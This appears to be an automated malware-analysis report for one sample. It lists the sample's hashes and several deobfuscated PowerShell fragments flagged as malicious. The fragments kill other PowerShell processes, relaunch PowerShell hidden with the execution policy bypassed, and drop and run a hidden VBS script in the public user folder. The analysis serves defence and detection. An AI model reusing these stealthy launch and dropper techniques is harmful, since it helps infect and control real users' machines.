| Hash | Hash Value |
|---|---|
| MD5 | 3be7d8115257735e4cb4773af2f5408c |
| Sha1 | 730514b1e2e214cefe6f76e0c3a1559da611bd87 |
| Sha256 | 586671d2c8263999999dfd05ebab5afe6d21a480215c9155eeb1e95db6f51aa4 |
| Sha384 | 8f58df67f602bc11e23f6d23971d1dbe1965adfa8764a48e3a378fb1788bb8f4a231f5560dadd5ad8536565245626c42 |
| Sha512 | 795b3a6c495707982cfb4a2eba420dfe55b47c8bd10827444eafd36377bad2ded0a189778545761797c9a69fd0bb0136f62cc0e90b078ff113ccbdb82d9d0443 |
| SSDeep | 3072:dj07S7Wb80555nLqJiwCIGMQPdi4EDYouZTE8JC+VJdztDafdMSqLduGxy8NLOXJ:iSCuJiwCIp+vYH/ |
| TLSH | A8D47B0AD59033351A18F26E1D96008ED1E3EAD87F3AE64D87D4CDA67A157EF290312F |
|
| Name0 | Value |
|---|---|
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "powershell.exe" -ArgumentList @("-NoProfile", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden", "-File", "" & ps1Path & "") -WindowStyle "Hidden"||NL||sh.Run cmd, 0, False" $c = $c -replace @("\|\|NL\|\|", [char] 10) [File]::"WriteAllText"($p + "\script.vbs", $c) Start-Process "wscript" -ArgumentList "" "C:\Users\Public\script.vbs" -WindowStyle "Hidden" |
| Deobfuscated PowerShell | "" Get-Process "powershell" -ErrorAction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden |
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden |
|
| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "powershell.exe" -ArgumentList @("-NoProfile", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden", "-File", "" & ps1Path & "") -WindowStyle "Hidden"||NL||sh.Run cmd, 0, False" $c = $c -replace @("\|\|NL\|\|", [char] 10) [File]::"WriteAllText"($p + "\script.vbs", $c) Start-Process "wscript" -ArgumentList "" "C:\Users\Public\script.vbs" -WindowStyle "Hidden" Malicious |
3be7d8115257735e4cb4773af2f5408c > [Deobfuscated PS] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | "" Get-Process "powershell" -ErrorAction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden Malicious |
3be7d8115257735e4cb4773af2f5408c > [PowerShell Command] |
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden Malicious |
3be7d8115257735e4cb4773af2f5408c > [PowerShell Command] > [PowerShell Command] |